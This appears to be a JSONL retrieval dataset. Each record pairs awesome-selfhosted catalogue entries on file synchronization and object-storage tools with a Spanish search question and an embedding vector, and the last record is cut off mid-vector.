"pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Peergos β€” Secure and private space online where you can store, share and view your photos, videos, music and documents. Also includes a calendar, news feed, task lists, chat and email client [AGPL-3.0, Java]. Puter β€” Web-based operating system designed to be feature-rich, exceptionally fast, and highly extensible [AGPL-3.0, Nodejs/Docker]. Pydio β€” Turn any web server into a powerful file management system and an alternative to mainstream cloud storage providers [AGPL-3.0, Go]. Samba β€” Samba is the standard Windows interoperability suite of programs for Linux and Unix. It provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol [GPL-3.0, C]. Seafile β€” File hosting and sharing solution primary for teams and organizations [GPL-2.0/GPL-3.0/AGPL-3.0/Apache-2.0, C]. Sync-in β€” File storage, syncing, sharing, and collaboration with real-time editing, permission management, and desktop/CLI clients [AGPL-3.0, Nodejs/Docker].", "indexar": "con que puedo transformar cualquier servidor web en un sistema potente de gestiΓ³n de archivos", "v": [-0.00385, 0.03562, -0.13718, -0.20614, -0.03716, -0.05599, 0.0338, -0.06993, -0.03622, -0.12132, -0.12116, 0.00323, 0.03185, -0.01511, -0.01484, 0.10333, 0.13373, -0.19079, 0.03461, -0.01345, -0.01249, -0.02894, 0.01126, -0.12664, 0.00256, -0.02177, 0.08042, -0.01666, -0.10251, -0.04791, -0.03832, 0.0203, 0.05431, -0.0191, 0.03307, -0.03059, -0.06602, 0.19696, -0.04627, 0.04077, 0.01693, -0.00457, -0.05306, 0.09039, 0.05189, -0.00352, 0.07479, -0.1119, 0.08416, -0.06229, -0.17039, -0.15222, -0.18612, -0.04267, 0.0404, -0.05748, 0.02213, -0.18003, 0.03977, -0.07908, -0.10387, 0.13237, -0.03871, -0.0621, 0.07013, 0.05441, -0.05703, -0.03922, -0.15531, 0.06579, -0.05046, 0.00937, 0.04299, -0.03481, 0.06478, 0.03211, 0.04123, 0.01027, -0.0672, 0.01699, 0.04563, -0.0011, -0.10685, 0.12086, -0.06602, -0.03442, -0.01293, -0.07375, 0.06169, -0.02572, 0.05617, -0.0543, -0.02875, 0.01227, 0.04239, 0.02669, 0.08599, -0.04135, -0.03514, -0.04822, -0.00676, 0.06269, -0.07302, 0.11883, 0.08205, 0.08114, 0.0938, -0.03592, 0.06634, -0.07515, -0.00167, -0.03653, 0.00977, 0.02051, -0.05205, 0.01127, -0.00053, -0.01677, -0.01654, 0.01401, -0.10237, -0.01085, 0.02189, -0.03728, 0.07922, 0.01793, 0.08523, 0.05271, -0.0141, -0.03123, 0.01993, -0.00344, -0.07448, -0.0141, -0.03561, -0.03458, 0.01812, 0.08124, -0.02969, -0.03785, -0.05157, 0.07304, -0.01737, 0.01225, 0.12785, -0.05414, 0.07413, -0.06248, -0.08749, -0.05169, -0.02154, -0.03933, -0.04285, -0.00988, -0.15766, 0.03106, -0.00549, -0.12041, -0.12265, 0.0254, -0.03405, 0.06823, 0.02761, 0.10423, -0.01814, 0.00654, -0.05012, 0.07117, 0.02025, 0.00482, -0.00566, 0.03474, 0.02653, -0.01913, 0.01987, -0.00934, -0.1176, -0.08717, 0.075, -0.00021, -0.01554, 0.02449, -0.02162, 0.04846, -0.03889, 0.02663, 0.00687, 0.03048, -0.05123, 0.02862, 0.05903, 0.02239, -0.0665, 0.01766, 0.03422, -0.01616, -0.09342, -0.03863, -0.02371, -0.03697, -0.04068, -0.05006, -0.0231, -0.03716, -0.05292, 0.01731, -0.00364, 0.02795, 0.01072, 0.02649, -0.01597, 0.00947, 0.1016, -0.07132, -0.04603, -0.01806, 0.01334, -0.03889, 0.00404, -0.04236, 0.02396, -0.01575, 0.04868, 0.03681, 0.04187, -0.00381, -0.01968, -0.01064, 0.02026, -0.04842, -0.04367, -0.05223, -0.00262, 0.00033, -0.01106, -0.06328, 0.00068, -0.0352, -0.09184, -0.07504, -0.0055, 0.09073, 0.02028, -0.01804, -0.01577, -0.09308, -0.05057, -0.02767, -0.0164, -0.06846, -0.01543, 0.03422, 0.00682, -0.02495, -0.00506, 0.02593]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Peergos β€” Secure and private space online where you can store, share and view your photos, videos, music and documents. Also includes a calendar, news feed, task lists, chat and email client [AGPL-3.0, Java]. Puter β€” Web-based operating system designed to be feature-rich, exceptionally fast, and highly extensible [AGPL-3.0, Nodejs/Docker]. Pydio β€” Turn any web server into a powerful file management system and an alternative to mainstream cloud storage providers [AGPL-3.0, Go]. Samba β€” Samba is the standard Windows interoperability suite of programs for Linux and Unix. It provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol [GPL-3.0, C]. Seafile β€” File hosting and sharing solution primary for teams and organizations [GPL-2.0/GPL-3.0/AGPL-3.0/Apache-2.0, C]. Sync-in β€” File storage, syncing, sharing, and collaboration with real-time editing, permission management, and desktop/CLI clients [AGPL-3.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a los proveedores de almacenamiento en la nube mainstream", "v": [0.06221, -0.01683, -0.09991, -0.06885, -0.03642, 0.02805, -0.03536, -0.09615, -0.26378, -0.12036, -0.06537, -0.09163, -0.03079, 0.01705, -0.11135, 0.01858, -0.0375, -0.13111, 0.05968, 0.09373, -0.06367, -0.01254, -0.14731, -0.03337, -0.0769, -0.01111, 0.03563, 0.04626, -0.16085, 0.01822, 0.02265, -0.03144, 0.04686, -0.00052, -0.0381, 0.00478, 0.04992, 0.09338, -0.09368, -0.03795, 0.08517, -0.03982, -0.06779, 0.06108, -0.02332, -0.05243, -0.09042, 0.01337, 0.0385, 0.02685, -0.0828, 0.01313, -0.04616, 0.08953, 0.07188, -0.00366, 0.05519, -0.08941, -0.00223, -0.03457, -0.18139, 0.13328, 0.04175, -0.16689, 0.04695, 0.01808, -0.14767, 0.06894, -0.20284, -0.01214, 0.0605, -0.03634, 0.02143, -0.07826, -0.05808, 0.14955, -0.03787, 0.01613, -0.05654, 0.05872, 0.08561, -0.0127, 0.08498, 0.04599, -0.0383, -0.12097, 0.05689, -0.08439, -0.05664, 0.07812, 0.07432, 0.07324, -0.03586, 0.14473, 0.06673, -0.06087, 0.0703, 0.02161, -0.01928, 0.03581, 0.08977, 0.11902, -0.03182, 0.00761, 0.01145, 0.00662, 0.04982, -0.06853, -0.05572, 0.0051, 0.01629, 0.03689, 0.02639, 0.0434, -0.01032, -0.0144, 0.02589, -0.06959, -0.0449, 0.04815, 0.00894, 0.02421, 0.01853, -0.02645, 0.03793, 0.00328, -0.00792, 0.03765, -0.06973, 0.00692, 0.03811, -0.01325, 0.01115, 0.04874, 0.02094, -0.03332, -0.01308, -0.07901, 0.1002, -0.03711, 0.06255, -0.02838, 0.01794, 0.01023, 0.07, -0.06806, 0.07439, -0.04033, -0.01149, -0.04085, -0.04941, 0.0821, -0.08551, 0.0381, -0.0813, 0.06406, -0.05413, -0.09171, -0.0948, 0.03376, 0.07696, -0.02417, -0.03857, 0.04537, -0.03683, 0.01124, -0.01118, -0.00879, -0.03608, 0.0564, -0.02211, 0.00349, -0.03492, -0.06206, 0.06724, -0.03658, 0.06094, -0.13978, 0.10313, 0.00292, -0.00975, 0.01916, -0.10883, 0.10304, 0.01195, -0.08029, 0.01125, 0.03236, 0.00565, 0.05694, -0.02433, 0.0003, -0.06601, -0.08715, 0.01697, -0.05944, -0.08613, -0.05055, -0.03707, 0.02597, -0.06544, 0.0347, -0.03687, -0.01495, -0.04159, 0.00336, -0.0841, 0.05075, 0.00299, 0.02551, 0.03994, -0.01495, 0.01643, -0.06347, 0.01116, -0.03072, 0.03795, -0.01326, -0.02425, 0.01108, -0.02694, -0.02869, 0.02716, -0.06549, -0.09485, 0.00791, 0.02409, 0.06605, -0.02735, 0.00964, -0.04197, 0.02587, -0.04533, -0.00057, 0.02445, 0.03189, 0.01607, 0.01689, 0.01439, -0.00698, 0.01283, 0.0312, -0.07992, 0.00292, -0.01083, -0.00812, -0.1137, 0.02213, -0.01637, -0.06439, -0.04788, 0.06231, 0.01616, -0.04885, 0.06537, -0.01648]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Syncthing β€” Syncthing is an open source peer-to-peer file synchronisation tool [MPL-2.0, Go/Docker/deb]. Unison β€” Unison is a file-synchronization tool for OSX, Unix, and Windows [GPL-3.0, deb/OCaml].", "indexar": "que programa para sincronizar archivos funciona entre equipos diferentes?", "v": [-0.05298, -0.03846, -0.08376, -0.17408, 0.0174, -0.20746, 0.00561, 0.01044, -0.03321, -0.08673, -0.07738, -0.13489, 0.02203, -0.02972, 0.10832, -0.0353, 0.03658, -0.10688, 0.06396, 0.04638, -0.03944, -0.0005, 0.05621, -0.14379, -0.07107, 0.07433, -0.03079, 0.05808, -0.10512, -0.00648, 0.00191, 0.00169, 0.25056, -0.0667, 0.03492, -0.01476, 0.07289, 0.04765, 0.00242, 0.14491, -0.10227, 0.02867, -0.0801, -0.00715, 0.05838, 0.02749, 0.07727, 0.00195, 0.05383, -0.03286, -0.07929, 0.0506, 0.03873, -0.03652, -0.05754, -0.14372, -0.07143, -0.15243, -0.02072, -0.01437, -0.0234, 0.03426, -0.06919, -0.07919, 0.02769, 0.06773, 0.02191, -0.05447, -0.06142, 0.08487, 0.01985, 0.04364, 0.03551, -0.02543, -0.08307, 0.0974, 0.03897, 0.00584, -0.0293, -0.03259, 0.10184, 0.09337, 0.03642, 0.06601, -0.10573, -0.04953, 0.07716, 0.10413, 0.03847, -0.03388, 0.01405, 0.07622, 0.04137, 0.07337, 0.11021, -0.06289, 0.10265, -0.04639, 0.00962, 0.03822, 0.04004, 0.01939, -0.05491, 0.0818, -0.06306, 0.13645, 0.12021, 0.09165, -0.01618, -0.01695, -0.00435, -0.0115, -0.0374, 0.05112, -0.14603, 0.0101, -0.04191, -0.08591, 0.07237, -0.03144, -0.10277, 0.07797, -0.03265, -0.02321, 0.1101, -0.0347, 0.12367, 0.06739, -0.05274, 0.13651, 0.06896, 0.05887, -0.06278, 0.01871, -0.13696, -0.08575, 0.02234, -0.00216, -0.07798, -0.07208, 0.08508, 0.06125, 0.02031, 0.05914, 0.02165, -0.02336, -0.00387, -0.08682, 0.00368, -0.02052, 0.02903, -0.0071, -0.04231, -0.04976, -0.08389, 0.02929, 0.02057, -0.0267, -0.10238, -0.0098, -0.10181, -0.05615, -0.00167, -0.04824, 0.03406, -0.07297, 0.00772, 0.01334, 0.06218, 0.03131, 0.02068, 0.06334, 0.06877, -0.05024, -0.03933, 0.06532, -0.00517, -0.03377, 0.08065, -0.03875, -0.06162, 0.03835, 0.08404, -0.00185, 0.01418, -0.01148, -0.03407, 0.05347, -0.07395, -0.0004, -0.01269, -0.05327, -0.01848, -0.02204, -0.01029, 0.00299, -0.00968, -0.04112, 0.01211, -0.02953, 0.0278, 0.01346, 0.02518, 0.05171, -0.00864, 0.06139, -0.05404, -0.00526, 0.06816, 0.03785, 0.0425, -0.0164, 0.0002, 0.04152, -0.02728, -0.01388, -0.08508, 0.01964, 0.07301, 0.00588, 0.02107, -0.04115, 0.01373, 0.05707, -0.04451, -0.02909, -0.01962, 0.04661, 0.00356, -0.05245, -0.01572, -0.00899, 0.02763, 0.06078, -0.00523, -0.00548, -0.03034, 0.00524, 0.04072, -0.04029, -0.07072, 0.05342, 0.02117, 0.00886, -0.016, 0.03055, 0.00158, -0.08257, 0.01878, 0.04856, -0.00529, 0.05707, -0.03341, 0.01508, 0.0655, 0.08078]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Syncthing β€” Syncthing is an open source peer-to-peer file synchronisation tool [MPL-2.0, Go/Docker/deb]. Unison β€” Unison is a file-synchronization tool for OSX, Unix, and Windows [GPL-3.0, deb/OCaml].", "indexar": "con quΓ© herramienta puedo tener una copia automΓ‘tica de mis documentos sin servidor?", "v": [-0.02152, 0.10452, -0.11281, -0.14454, 0.00594, -0.15697, -0.00098, -0.0295, -0.08972, -0.01709, -0.13088, -0.07032, 0.0866, -0.12073, 0.08588, 0.05531, 0.18611, -0.18465, 0.0174, 0.06239, 0.07738, -0.02766, 0.01329, -0.05558, -0.08747, -0.00628, 0.07941, -0.04514, -0.18472, 0.00986, 0.02932, 0.04985, 0.05909, -0.01396, -0.05158, -0.01788, -0.04155, 0.11947, -0.08286, 0.02793, 0.0777, 0.06046, -0.1473, 0.07952, -0.02788, 0.00101, 0.01562, 0.05303, -0.01777, 0.02959, -0.05199, -0.15785, -0.13057, -0.03107, -0.07708, -0.12234, 0.2395, -0.11372, 0.10302, -0.08909, -0.10528, 0.08967, -0.09424, -0.00379, 0.01177, 0.00208, 0.02951, -0.11172, -0.02908, 0.00911, -0.06437, 0.05824, 0.04129, -0.11564, 0.0456, 0.00042, -0.07806, -0.01691, -0.03387, 0.12825, 0.03671, -0.01774, -0.05753, 0.05567, -0.05708, -0.16423, 0.03071, 0.00619, 0.10054, -0.03795, 0.03197, 0.04822, -0.01386, 0.0551, 0.01788, -0.05394, 0.0643, -0.05461, -0.04254, 0.01213, 0.11176, -0.01039, -0.04932, 0.05874, -0.02424, 0.05355, 0.01602, -0.02645, -0.02737, -0.00481, 0.06323, 0.0246, -0.05446, 0.03646, -0.05669, -0.01252, 0.0154, 0.02214, -0.02515, 0.00621, 0.01712, -0.00348, -0.00237, -0.00822, 0.0342, -0.09259, -0.00338, 0.09315, -0.04911, -0.08145, 0.03705, -0.02138, -0.09493, -0.01505, 0.02713, -0.01507, -0.02823, -0.11583, -0.04533, -0.11725, -0.02387, -0.00813, -0.07347, -0.04983, 0.04617, -0.00352, 0.0623, -0.08906, -0.05211, -0.04447, -0.00501, -0.09498, 0.03755, 0.03234, -0.07154, 0.03892, 0.0123, -0.04153, -0.0579, 0.03298, 0.0145, -0.00213, 0.01544, 0.07406, 0.01591, -0.00626, -0.00253, 0.03146, 0.05195, 0.03295, 0.01479, -0.02642, 0.03772, -0.07455, 0.00063, -0.07481, -0.06062, -0.00765, 0.01946, -0.04759, -0.07472, 0.05722, -0.03335, 0.00285, -0.01597, -0.03015, 0.04773, -0.03442, 0.06077, 0.016, 0.01216, 0.05417, -0.03045, -0.0303, 0.04129, -0.04979, -0.03967, -0.03469, 0.0258, -0.01183, -0.06462, -0.05062, -0.04439, -0.03741, 0.04386, 0.05198, -0.04539, 0.03048, -0.02059, 0.05152, -0.03813, -0.01737, 0.08894, -0.03228, -0.04706, -0.0362, 0.01873, -0.03414, -0.01468, -0.04477, 0.07769, 0.01081, 0.08062, -0.01774, 0.00955, 0.02439, 0.05594, 0.05257, 0.04383, -0.00375, -0.04261, 0.06174, -0.02703, -0.0125, 0.06384, -0.02078, 0.00617, -0.07592, -0.07965, -0.07859, -0.013, 0.07571, 0.00831, -0.06311, -0.0456, -0.04867, 0.0011, -0.04184, -0.00258, -0.05639, 0.01449, -0.00025, 0.06426, -0.06855, 0.02616, -0.03277]} +{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Syncthing β€” Syncthing is an open source peer-to-peer file synchronisation tool [MPL-2.0, Go/Docker/deb]. Unison β€” Unison is a file-synchronization tool for OSX, Unix, and Windows [GPL-3.0, deb/OCaml].", "indexar": "cual es una alternativa libre a Dropbox o Google Drive para copiar archivos?", "v": [0.03806, -0.04626, -0.0425, -0.07958, -0.0534, -0.08458, 0.11386, 0.07431, -0.05582, -0.06086, -0.02324, -0.2761, -0.0758, -0.09737, -0.08747, -0.19356, 0.13891, -0.07129, -0.05701, -0.08722, 0.00373, 0.02425, -0.10591, -0.08876, 0.06799, -0.1382, -0.09396, 0.08151, -0.12357, 0.08619, 0.06353, -0.08607, 0.02099, -0.00764, -0.09586, -0.01112, 0.08888, -0.00423, 0.0255, -0.02559, 0.05009, 0.03388, -0.19063, 0.21808, -0.15697, -0.02085, 0.05666, -0.00321, -0.07012, -0.0275, -0.02047, -0.00984, -0.07061, 0.07748, -0.04525, 0.07071, 0.093, -0.15023, 0.00709, 0.03438, -0.12765, 0.12013, -0.1066, 0.06437, 0.05232, -0.00227, 0.03274, 0.03643, -0.18827, 0.10142, 0.07104, 0.08243, 0.01735, -0.01361, 0.04096, 0.03795, 0.03439, -0.03426, -0.08271, 0.09991, 0.15846, -0.04727, -0.01188, 0.01142, -0.10182, -0.13005, 0.05218, -0.01773, 0.06344, 0.04856, 0.03439, 0.03491, -0.00679, 0.10507, -0.00214, -0.06309, 0.07737, -0.03601, -0.0713, 0.01463, 0.06034, 0.03557, -0.01976, 0.01474, -0.04548, 0.06689, -0.0218, -0.05047, -0.04952, -0.05382, 0.03528, 0.03039, 0.07328, 0.01797, -0.03746, -0.02044, 0.02232, 0.00141, -0.00649, 0.02101, -0.00107, -0.02581, -0.07782, -0.04478, 0.01105, 0.00373, 0.01735, 0.03461, -0.10412, 0.01658, 0.05292, 0.02614, -0.06501, -0.00046, -0.04574, 0.03433, 0.00941, -0.04501, -0.02542, -0.04876, 0.00518, -0.04397, 0.00593, -0.02066, 0.04052, -0.0508, 0.03934, -0.01309, -0.03764, -0.09108, -0.04049, -0.00756, -0.06561, -0.03536, 0.01985, 0.07081, -0.07744, -0.1086, -0.0673, 0.03503, -0.01655, -0.02579, -0.05204, 0.00468, -0.02766, -0.00442, 0.10839, 0.006, -0.04749, -0.00188, -0.02657, 0.05413, 0.00123, -0.07181, 0.00503, -0.04223, 0.05964, -0.02374, 0.07706, 0.0174, -0.00034, -0.00509, -0.03573, 0.05413, -0.03399, -0.09166, 0.02508, 0.01333, 0.02628, 0.06442, -0.05418, 0.02776, -0.0326, -0.03912, 0.00807, -0.05398, -0.047, -0.07703, -0.00642, 0.06781, -0.06889, -0.07249, -0.08918, 0.01377, -0.02324, -0.03257, -0.00097, 0.03981, -0.0198, -0.02595, -0.04123, -0.00178, 0.01863, -0.00605, 0.00215, -0.0256, 0.01376, 0.02382, 0.02108, -0.04834, 0.00184, -0.00655, 0.04391, -0.02432, 0.00477, 0.03518, 0.02141, 0.00381, -0.05426, -0.02659, 0.02992, 0.02885, -0.028, 0.01792, 0.06732, 0.01956, -0.03, 0.01506, 0.03038, -0.02437, -0.01002, 0.02682, -0.03245, 0.02921, -0.0693, 0.00038, -0.07557, 0.02018, 0.02543, -0.04048, 0.01548, 0.04648, 0.01457, -0.01722, -0.00515, 0.01018]} +{"tipo": "pregunta", "herramienta": "File Transfer - Object Storage & File Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Object Storage & File Servers", "tema": "file transfer - object storage & file servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Object Storage & File Servers: GarageHQ β€” Geo-distributed, S3‑compatible storage service that can fulfill many needs [AGPL-3.0, Docker/Rust]. Harbor β€” Cloud native image registry that stores, signs, and scans content [Apache-2.0, Docker/K8S]. SeaweedFS β€” SeaweedFS is an open source distributed file system supporting WebDAV, S3 API, FUSE mount, HDFS, etc, optimized for lots of small files, and easy to add capacity [Apache-2.0, Go]. Zenko CloudServer β€” Zenko CloudServer, an open-source implementation of a server handling the Amazon S3 protocol [Apache-2.0, Docker/Nodejs]. ZOT OCI Registry β€” A production-ready vendor-neutral OCI-native container image registry [Apache-2.0, Go/Docker].", "indexar": "quΓ© programa hay para guardar copias de seguridad en la nube que funcione con cualquier servicio?", "v": [-0.00928, 0.03655, -0.14422, -0.10441, -0.0153, -0.21258, -0.03771, -0.0071, -0.12543, -0.1599, -0.07937, -0.13873, -0.01987, 0.05198, -0.03541, -0.03865, 0.0621, -0.09789, 0.04269, 0.12831, -0.00023, 0.03801, -0.01042, -0.05737, -0.13234, 0.01229, 0.11667, -0.02926, -0.13287, 0.03934, 0.08307, -0.04014, 0.11179, -0.08904, -0.04063, 0.00419, 0.03497, 0.02955, -0.0269, -0.00293, 0.04395, -0.02657, -0.05914, 0.10896, -0.00382, -0.07716, 0.04605, -0.02169, 0.05956, 0.02242, -0.06787, -0.06481, -0.02972, -0.07974, -0.07773, -0.0628, 0.02093, -0.06959, 0.01297, 0.00672, -0.15038, 0.07787, 0.06379, -0.06198, 0.07966, -0.04783, 0.0187, -0.04771, -0.1251, 0.0237, -0.08677, 0.09975, -0.00955, 0.0476, 0.00377, -0.01789, -0.04889, -0.06414, -0.05479, 0.13144, -0.03053, 0.06546, -0.00093, 0.02394, -0.1077, -0.05805, 0.00297, -0.05832, -0.08211, 0.03448, 0.05496, 0.05481, 0.02912, 0.13743, 0.02368, -0.01526, 0.08929, 0.10385, -0.01002, 0.02347, 0.09787, -0.02162, -0.01387, 0.0806, -0.09425, 0.06481, 0.0729, -0.00819, 0.00337, 0.00162, -0.02038, -0.00979, -0.05454, -0.00214, -0.13209, -0.0577, 0.01801, -0.07752, 0.05449, 0.04638, -0.07586, -0.00359, -0.00655, -0.00649, 0.11882, -0.00739, -0.02967, 0.1112, -0.13295, -0.06564, -0.0435, 0.01158, -0.06658, 0.03044, 0.01048, -0.02179, -0.11778, -0.11896, 0.00725, -0.08119, 0.0423, 0.05475, 0.00403, 0.06018, 0.01415, 0.01368, 0.08604, -0.00131, -0.02047, -0.00703, 0.02572, -0.00195, -0.07737, 0.0417, -0.07828, 0.05317, 0.00125, -0.12285, -0.0623, 0.06856, 0.07473, 0.03991, 0.05087, -0.03541, 0.03357, -0.03799, 0.01525, 0.02602, 0.05965, 0.06223, -0.08005, 0.00187, 0.01588, -0.16296, 0.00706, -0.00809, -0.05519, -0.08964, 0.07328, -0.03442, -0.08464, -0.01054, 0.05909, 0.0838, 0.02738, -0.06813, -0.01359, 0.07495, -0.02693, 0.02537, 0.02087, -0.01925, -0.07392, 0.00187, 0.00572, -0.07486, -0.04791, -0.04589, 0.01739, 0.03715, -0.10473, -0.00216, -0.05861, -0.02409, 0.05853, 0.02017, -0.02409, 0.04014, 0.01121, 0.0315, 0.00139, -0.01804, 0.02405, -0.02892, -0.02228, -0.00807, 0.01161, 0.01104, 0.00302, -0.00439, 0.02665, -0.02561, 0.03119, -0.02307, -0.0088, -0.04516, 0.0382, 0.08868, 0.08369, 0.02713, -0.00871, 0.00617, -0.03569, -0.05032, 0.03037, -0.01725, 0.02366, -0.01371, -0.03191, -0.12511, -0.04408, 0.12513, -0.03453, -0.02868, -0.09836, -0.00682, -0.08065, 0.07203, 0.04239, -0.05708, 0.00198, 0.06842, 0.00434, -0.06354, 0.01905, -0.04931]} +{"tipo": "pregunta", "herramienta": "File Transfer - Object Storage & File Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Object Storage & File Servers", "tema": "file transfer - object storage & file servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Object Storage & File Servers: GarageHQ β€” Geo-distributed, S3‑compatible storage service that can fulfill many needs [AGPL-3.0, Docker/Rust]. Harbor β€” Cloud native image registry that stores, signs, and scans content [Apache-2.0, Docker/K8S]. SeaweedFS β€” SeaweedFS is an open source distributed file system supporting WebDAV, S3 API, FUSE mount, HDFS, etc, optimized for lots of small files, and easy to add capacity [Apache-2.0, Go]. Zenko CloudServer β€” Zenko CloudServer, an open-source implementation of a server handling the Amazon S3 protocol [Apache-2.0, Docker/Nodejs]. ZOT OCI Registry β€” A production-ready vendor-neutral OCI-native container image registry [Apache-2.0, Go/Docker].", "indexar": "con quΓ© puedo montar un servidor para guardar imΓ‘genes y contenedores de forma segura?", "v": [0.08203, -0.0039, -0.21747, -0.10086, -0.12546, -0.07962, 0.01424, -0.02281, -0.03026, -0.16432, -0.11671, -0.01131, 0.05675, -0.01338, 0.04806, 0.1378, 0.15263, -0.09095, 0.02064, 0.09743, 0.03871, 0.01875, 0.0254, -0.08323, -0.07131, 0.03565, 0.01789, -0.03135, -0.09278, 0.00287, 0.02017, 0.04641, 0.10749, 0.11928, -0.1091, -0.08767, -0.02762, 0.03578, -0.06459, -0.01944, 0.00749, 0.02942, -0.03661, 0.03251, -0.07921, 0.00761, 0.02599, -0.09453, 0.07853, -0.06076, 0.0284, -0.04645, -0.05826, 0.02525, -0.11725, -0.0383, 0.09519, -0.02824, 0.1652, 0.00219, -0.04411, 0.13297, -0.02197, 0.09964, 0.03431, 0.02756, -0.06955, 0.0211, -0.13911, -0.10793, -0.03909, -0.04142, 0.03163, 0.00547, -0.00351, 0.06373, -0.0499, 0.0377, -0.026, 0.12432, -0.02013, 0.02399, -0.04533, 0.0662, -0.04965, -0.12504, -0.05678, -0.01709, 0.04454, -0.04193, 0.07814, 0.00705, -0.00783, 0.09765, -0.03099, -0.05489, 0.04852, 0.07153, -0.04988, -0.00098, 0.01382, 0.02854, 0.00547, 0.06337, 0.03284, 0.07209, 0.08431, -0.10564, 0.1143, -0.09834, 0.06626, 0.02188, -0.10665, -0.00693, -0.12648, -0.06163, -0.03208, -0.03522, 0.05492, 0.01073, -0.01146, 0.01152, 0.02431, 0.08051, 0.12956, -0.04609, 0.08337, 0.07753, -0.1453, -0.03325, -0.07869, 0.00339, -0.10241, -0.07313, -0.02746, -0.04508, 0.02584, -0.12405, -0.05668, -0.03492, -0.02821, 0.00287, -0.01866, -0.06375, 0.06817, 0.03166, 0.07031, -0.0118, -0.09151, 0.0084, 0.11107, 0.04149, 0.00941, -0.05672, -0.00647, 0.06815, 0.01845, -0.12288, -0.03678, 0.03726, -0.00574, 0.08149, 0.07185, 0.06132, -0.04371, -0.05307, -0.00571, -0.02392, -0.01218, 0.01115, 0.01305, -0.02777, 0.00522, -0.03685, 0.01424, -0.00617, -0.08762, -0.08927, 0.02177, -0.01116, -0.03762, 0.03103, -0.00532, 0.08917, -0.03647, -0.11018, 0.00603, 0.04632, 0.00312, 0.05502, -0.00141, 0.02671, -0.0678, 0.00984, -0.00385, -0.08794, -0.02397, 0.02359, 0.03981, 0.06679, -0.03596, -0.07559, 0.02726, -0.01655, -0.0314, -0.05183, -0.12699, 0.07536, 0.03012, 0.0166, 0.02062, -0.00467, 0.07656, -0.08728, -0.02788, 0.01569, 0.03311, 0.00862, -0.06454, -0.00781, -0.06541, 0.02357, 0.01653, -0.01265, 0.0041, 0.01677, -0.00174, 0.03746, 0.05156, -0.02019, -0.03008, 0.05634, -0.0508, -0.00388, 0.06995, -0.00224, 0.00638, -0.04018, -0.02561, -0.10077, 0.02573, 0.09006, -0.03815, -0.02069, -0.02882, -0.04099, -0.06049, 0.05555, -0.00931, -0.08233, 0.00991, -0.00449, -0.00216, -0.05629, -0.01881, -0.05676]} +{"tipo": "pregunta", "herramienta": "File Transfer - Object Storage & File Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Object Storage & File Servers", "tema": "file transfer - object storage & file servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Object Storage & File Servers: GarageHQ β€” Geo-distributed, S3‑compatible storage service that can fulfill many needs [AGPL-3.0, Docker/Rust]. Harbor β€” Cloud native image registry that stores, signs, and scans content [Apache-2.0, Docker/K8S]. SeaweedFS β€” SeaweedFS is an open source distributed file system supporting WebDAV, S3 API, FUSE mount, HDFS, etc, optimized for lots of small files, and easy to add capacity [Apache-2.0, Go]. Zenko CloudServer β€” Zenko CloudServer, an open-source implementation of a server handling the Amazon S3 protocol [Apache-2.0, Docker/Nodejs]. ZOT OCI Registry β€” A production-ready vendor-neutral OCI-native container image registry [Apache-2.0, Go/Docker].", "indexar": "cuΓ‘l es una alternativa libre a Amazon S3 para almacenar archivos masivamente?", "v": [0.16932, -0.0656, 0.00462, -0.03136, -0.10871, -0.04587, -0.12763, -0.12332, -0.21423, -0.04043, -0.13598, -0.2038, 0.0103, 0.04999, 0.1204, 0.06026, 0.13902, 0.00436, 0.05409, 0.10955, 0.05531, -0.05487, -0.12473, -0.10335, -0.03534, -0.0778, 0.04275, 0.0744, -0.21686, 0.0247, -0.06856, 0.03453, 0.07764, -0.00347, 0.00887, 0.0326, 0.09413, 0.00776, 0.00799, -0.03122, 0.01086, 0.05901, -0.06511, 0.12618, -0.17693, 0.00745, 0.01362, 0.04129, -0.03418, 0.02186, -0.03885, 0.06997, -0.06277, 0.08168, 0.08234, 0.06401, 0.01856, -0.05947, 0.05557, 0.08823, -0.0355, 0.06401, 0.0942, 0.04197, -0.0303, 0.05086, -0.12192, 0.07953, -0.14612, 0.08254, 0.00741, -0.02104, 0.01741, -0.05225, -0.03754, 0.0934, 0.04896, 0.03316, -0.02346, 0.08209, 0.07267, -0.15624, 0.04646, 0.03559, 0.01902, -0.09192, 0.00992, -0.1024, 0.03733, -0.04697, 